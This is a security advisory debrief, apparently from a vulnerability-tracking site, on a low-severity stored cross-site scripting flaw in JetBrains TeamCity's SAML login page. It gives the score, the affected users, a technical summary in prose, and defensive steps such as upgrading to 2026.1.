PatchSiren cyber security CVE debrief
CVE-2026-49381 JetBrains CVE debrief
A stored cross-site scripting (XSS) vulnerability in JetBrains TeamCity before version 2026.1 allows an attacker with administrative privileges to inject malicious scripts into the SAML login page. The vulnerability requires high privileges and user interaction, limiting its exploitability. The CVSS 3.1 score of 3.4 reflects the need for an authenticated administrator to perform the attack and a victim to interact with the crafted content. The attack vector is network-based with low complexity, but the scope is changed due to the potential impact on downstream components. JetBrains has addressed this issue in TeamCity 2026.1. Organizations using affected versions should prioritize upgrading, particularly if SAML authentication is enabled and multiple administrative users access the system.
- Vendor
- JetBrains
- Product
- TeamCity
- CVSS
- LOW 3.4
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-29
- Original CVE updated
- 2026-05-29
- Advisory published
- 2026-05-29
- Advisory updated
- 2026-05-29
Who should care
Organizations running JetBrains TeamCity with SAML authentication enabled, particularly those with multiple administrators or shared administrative access. Security teams responsible for CI/CD infrastructure and identity federation configurations should assess exposure.
Technical summary
The vulnerability exists in the SAML login page implementation of JetBrains TeamCity prior to 2026.1. Insufficient input sanitization allows stored script injection by privileged users. The attack requires administrative access to modify SAML configuration elements that are rendered without proper output encoding. Successful exploitation could lead to session hijacking or credential theft when victims authenticate via the compromised SAML flow. The vulnerability is classified as CWE-79 and carries a LOW severity rating due to prerequisite conditions.
Defensive priority
LOW
Recommended defensive actions
- Upgrade JetBrains TeamCity to version 2026.1 or later
- Review SAML configuration pages for unauthorized modifications if running affected versions
- Implement principle of least privilege for administrative accounts
- Enable Content Security Policy headers where supported to mitigate XSS impact
- Monitor authentication logs for anomalous SAML-related activity
Evidence notes
Vulnerability confirmed via official JetBrains security advisory and NVD entry. CWE-79 (Improper Neutralization of Input During Web Page Generation) identified as root cause. CVSS vector confirms high privilege requirement (PR:H) and user interaction dependency (UI:R).
Official resources
-
CVE-2026-49381 CVE record
CVE.org
-
CVE-2026-49381 NVD detail
NVD
-
Source item URL
nvd_modified
- Source reference
2026-05-29